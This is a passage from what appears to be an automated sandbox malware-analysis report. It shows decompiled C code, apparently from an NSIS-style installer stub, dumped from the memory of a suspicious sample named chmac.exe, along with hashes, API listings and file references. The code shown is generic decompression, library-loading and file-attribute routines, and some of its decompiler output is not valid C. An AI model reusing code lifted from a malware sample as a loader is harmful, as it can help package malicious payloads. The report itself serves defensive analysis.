												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA3, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405dab
0x00405dae
0x00405db5
0x00405dbd
0x00405dca
0x00000000
0x00405dd1
0x00405dc0
0x00405dc8
0x00000000
0x00000000
0x00405dd9

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040575C, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405760
0x0040576d
0x00405782
0x00405788

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,80000000,00000003), ref: 00405760
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0040573D, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040573D(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}

0x00405741
0x0040574a
0x00405753
0x00000000
0x00405753
0x00405759

APIs

GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405753

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A

Uniqueness

Uniqueness Score: -1.00%

